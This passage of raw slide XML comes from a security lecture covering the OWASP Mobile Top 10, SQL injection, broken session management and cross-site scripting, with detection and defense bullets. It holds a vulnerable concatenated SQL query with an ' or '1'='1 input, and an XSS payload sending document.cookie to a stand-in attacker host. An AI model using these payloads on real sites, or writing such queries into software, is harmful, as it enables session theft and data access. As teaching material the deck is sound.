              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>A10-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Insufficient Logging and Monitoring</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="1800"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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457172" y="205014"/>
            <a:ext cx="8228700" cy="858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3700" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>OWASP Mobile Top 10</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="3700" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Google Shape;329;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622080" y="1244291"/>
            <a:ext cx="8228700" cy="3394800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2000" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="2000" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2000" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>M1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Improper Platform Usage</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="2000" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2000" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>M2: Insecure Data Storage</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="2000" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2000" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>M3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Insecure Communication</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="2000" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2000" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>M4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Insecure Authentication</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="2000" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2000" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>M5: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Insufficient Cryptography</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="2000" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2000" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>M6: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Insecure Authorization</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="2000" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2000" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>M7: Client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Code Quality</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="2000" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2000" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>M8: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Code Tampering</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="2000" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2000" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>M9: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Reverse Engineering</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="2000" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="355600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2000" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>M10: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Extraneous Functionality</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="2000"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5"/>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Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="Google Shape;335;p55"/>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Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> String query = "SELECT * FROM accounts WHERE custID=' "  + request.getParameter("id") + " ' "; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http://example.com/app/accountView?id=' or '1'='1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6"/>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Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="Google Shape;341;p56"/>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Detection: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>static code analysis tool</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Dynamic scanning</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Penetration testing</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Defense:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Us</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>e a safe API which avoids the use of the interpreter entirely or provides a parameterized interface. </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter. </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Positive or “white list” input validation is also recommended, but is not a complete defense as many applications require special characters in their input.</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7"/>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Broken Authentication and Session Management</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Google Shape;347;p57"/>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Leaks or flaws in authentication and session management can cause exposed accounts, passwords and session IDs to impersonate users.</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Session id is included in URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://example.com/sale/saleitems;jsessionid=2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>No timeout on session</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Passwords are not properly hashed. </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Passwords are used as a sole factor.</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8"/>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Broken Authentication and Session Management</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="Google Shape;353;p58"/>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Detection:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Credentials are stored or transmitted in clear text.</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Credentials can be easily guessed or overwritten.  </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Session IDs are exposed in the URL, don’t time out or easily guessed. </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Defense:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Strong control such as ensure to meet all requirements defined in OWASP’s Application Security Verification Standard (ASVS) areas V2 (Authentication) and V3 (Session Management).</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org/images/6/67/OWASPApplicationSecurityVerificationStandard3.0.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>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9"/>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Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Google Shape;359;p59"/>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Attacker sends text-based attack scripts that exploit the interpreter in the browser in which all user supplied input may not be properly escaped and validated.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>(String) page +="&lt;input name ='creditcard' type='TEXT' value='"+request.getParameter("CC")+"'&gt;";</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>"CC" as '&gt;&lt;script&gt;document.location='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.attacker.com/cgi-bin/cookie.cgi?foo=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>' +document.cookie&lt;/script&gt;'</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A good explanation: </a:t>
            </a:r>
            <a:r>
